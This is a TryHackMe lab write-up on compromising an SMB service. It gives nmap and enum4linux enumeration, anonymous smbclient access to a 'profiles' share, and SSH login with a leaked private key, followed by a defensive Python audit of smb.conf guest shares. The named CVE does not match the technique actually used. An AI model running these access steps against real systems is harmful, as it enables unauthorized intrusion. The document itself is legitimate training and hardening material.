- Purpose: Document my experience and share knowledge on the Cyber Defense challenges
- Scope: Learn the fundamental components of detecting and responding to threats in a corporate environment
- Environment: Kali Linux via VirtualBox
- Accounts and Access: Created a TryHackMe account and accessed the room via OpenVPN
- Objective: Enumerate the target's SMB service, exploit its vulnerabilities to exfiltrate sensitive data, gain access to the server and capture the flag
- Initial Scanning:
  - Tools and Commands:
    - Port Scanning:
      nmap -Pn 10.10.242.131
    - SMB Enumeration:
      enum4linux -U 10.10.242.131
      enum4linux -a 10.10.242.131
  - Findings:
    - Users are: administrator, guest, krbtgt, domain admins, root, bin, none
    - No password
    - Workgroup name is WORKGROUP
    - Name of machine is polosmb
    - OS running on version 6.1
    - Ports that are open:
      - 22/tcp open ssh
      - 139/tcp open netbios-ssn
      - 445/tcp open microsoft-ds
    - User profiles are shared over SMB under the share name 'profiles'
- Vulnerability Identification: CVE-2017-7494
- Techniques Used: Exploiting anonymous SMB share access, a common misconfiguration that can expose information leading to a shell.
- Exploitation Process:
  - Connect to the 'profiles' share as the Anonymous user:
    smbclient //10.10.242.131/profiles -U Anonymous
  - Press Enter at the password prompt because there is no password set
  - Download the text file (the name contains spaces, so quote it) to download it locally:
    get "Working From Home Information.txt"
  - View the text file in the terminal:
    cat "Working From Home Information.txt"
  - Access the server over SSH with the id_rsa key:
    ssh [email protected] -i id_rsa
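A defender's counterpart to the misconfiguration used above, as an added example that is not part of the original writeup or of the TryHackMe room: a small Python audit that reads a Samba smb.conf, reports every share that grants guest access (`guest ok = yes` or its synonym `public = yes`), records whether the share is writable and how `map to guest` is set in [global], and writes out a hardened copy with guest access switched off. The smb.conf text, the share names other than 'profiles' and all paths are constructed for the example.

```python
"""Audit a Samba smb.conf for shares that are reachable without credentials.

Added example, not from the original writeup or from TryHackMe. The 'profiles'
share in the room was readable by a made-up 'Anonymous' user, which is what
`guest ok = yes` (alias `public = yes`) on a share produces when [global]
`map to guest` turns unknown logons into the guest account.
"""

# Constructed smb.conf reproducing the misconfiguration; paths are placeholders.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = polosmb
   map to guest = Bad User

# Readable by anyone who connects, no credentials needed (as in the room)
[profiles]
   path = /home/profiles
   guest ok = yes
   read only = yes

# Worse: guest access plus write permission
[backups]
   path = /srv/backups
   public = yes
   writable = yes

# Correctly restricted share for comparison
[finance]
   path = /srv/finance
   valid users = @finance
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}
GUEST_KEYS = ("guest ok", "public")                  # Samba synonyms for guest access
WRITE_KEYS = ("writable", "writeable", "write ok")   # Samba synonyms, inverse of 'read only'


def _is_true(value):
    return value.strip().lower() in TRUE_VALUES


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank lines and comments
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def share_is_writable(share):
    """Samba default is 'read only = yes'; any write synonym set to yes overrides it."""
    if any(_is_true(share.get(k, "no")) for k in WRITE_KEYS):
        return True
    return not _is_true(share.get("read only", "yes"))


def audit_smb_conf(text):
    """Return one finding per share that grants guest (anonymous) access."""
    conf = parse_smb_conf(text)
    map_to_guest = conf.get("global", {}).get("map to guest", "never").lower()
    findings = []
    for name, share in conf.items():
        if name == "global":
            continue
        if any(_is_true(share.get(k, "no")) for k in GUEST_KEYS):
            findings.append({
                "share": name,
                "path": share.get("path", "?"),
                "writable": share_is_writable(share),
                # 'bad user' / 'bad password' map any unknown username to guest,
                # so a guest-ok share is open to everyone who can reach port 445.
                "map_to_guest": map_to_guest,
                "fix": f"[{name}]: set 'guest ok = no' and restrict with 'valid users'",
            })
    return findings


def harden_smb_conf(text):
    """Copy of the config with guest access off on every share and unknown
    logons rejected in [global] ('map to guest = Never', Samba's default)."""
    out = []
    for raw in text.splitlines():
        key, _, value = raw.strip().partition("=")
        k = key.strip().lower()
        if k in GUEST_KEYS and _is_true(value):
            out.append(raw[: raw.index("=") + 1] + " no")
        elif k == "map to guest":
            out.append(raw[: raw.index("=") + 1] + " Never")
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit_smb_conf(WEAK_SMB_CONF):
        print(finding)
    print(harden_smb_conf(WEAK_SMB_CONF))
```

To run it against a real host, read `/etc/samba/smb.conf` (or the output of `testparm -s`, which prints the effective configuration) in place of `WEAK_SMB_CONF`. On the room's target the 'profiles' share would be reported as guest-readable; since that share held a user's SSH private key, the finding is exactly the one the enumeration step above turned into a shell.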
- Challenges Faced: Difficulty comprehending instructions and which commands to use
- Learnings: Importance of thorough enumeration.
- Improvements: Try alternative enumeration techniques earlier.
- Summary: Successfully gained root access and captured the flag